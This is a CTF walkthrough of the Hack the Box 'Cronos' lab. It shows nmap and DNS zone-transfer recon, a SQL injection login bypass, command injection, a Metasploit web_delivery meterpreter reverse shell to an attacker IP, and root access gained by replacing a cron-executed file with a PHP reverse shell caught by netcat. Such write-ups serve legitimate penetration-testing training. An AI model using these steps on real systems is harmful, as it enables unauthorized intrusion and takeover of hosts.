Hack the Box Challenge: Cronos WalkthroughMarch 27, 2018 By Raj Chandel
Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. Cronos is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have a collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Cronos craft which is designed for beginners.
Task: find user.txt and root.txt file in the victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.13 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.13
From the given below image, you can observe we found port 22,53,80 are open in the victim’s network.
Knowing port 80 is open in the victim’s network we preferred to explore this IP in a browser but didn’t get any remarkable clue for next step. It just came out that the Apache HTTP Server is working properly.
Now we have added the domain name of the target machine in the /etc/hosts file to access the webpage using the IP address as well as Domain Name that we have added.
Knowing that Port 53 is open. We have used command host -l cronos.htb 10.10.10.13 to check the DNS running on this IP. On the other hand, it gave us a clue for our next step which is another Domain Name i.e admin.cronos.htb
Now we have added the new domain name which was found in the previous step inside /etc/hosts file to access this webpage with both IP address and Domain Name.
Now open https://admin.cronos.htb on the browser. And it came out to be a Login Portal asking for username and password credentials to log us in. Basically, we know in a situation like this, we might generally use Brute Forcing or SQL Injection. After long hours of trying we finally breached it using SQL injection command in the Username and giving any Random Number in the Password.
From the previous step, we are successfully logged into this portal. And the page opened is given below.
Now in this critical situation, we thought of running command injection; ls as shown below. Which showed us some .php files.
We have used Metasploit exploit /multi/script/web_delivery and got the meterpreter as you can see below.
msf use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) set target 1
msf exploit(multi/script/web_delivery) set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) set lhost 10.10.14.3
msf exploit(multi/script/web_delivery) set lport 8082
msf exploit(multi/script/web_delivery) exploit
Next, you can we have pasted the copied command and clicked on execute.
There we got our first Session along with the meterpreter. Once we have got the meterpreter. We have used command cd /home to check what kind of directories are on home. Then we check inside the noulis directory using command ls /home/noulis, here we found out the user.txt file and used cat user.txt to read the file content which contains our first FLAG!!
After we have used command cat crontab to view the contents inside the crontab. Hereby viewing the logs of crontab we saw a PHP file which has been scheduled and gets executed every time.
So we thought of downloading this file to our Desktop by using the command
download /var/www/laravel/artisan /root/Desktop/ .
Now we have used a default web shell named php-reverse-shell.php and by editing this file using the text editor. We have changed the IP to our local host IP and changed the port to 1234. Click on Save. And we have also changed the name of this file to artisan which was the name of the file we downloaded earlier.
It’s time to upload this file artisan.php to the same location from where we downloaded the original artisan file. For this the command used is
upload /root/Desktop/artisan.php /var/www/laravel/artisan
Next, we have started a netcat listener using command nc –lvp 1234. Therefore as per crontab, the scheduled artisan.php can be executed whenever its turn will come up. After a few minutes this file got executed, then we used command ls to look a directory named root. The command used is cat /root for the contents in the root directory. We found the root.txt file. By using command cat /root.txt. We found out final Flag!!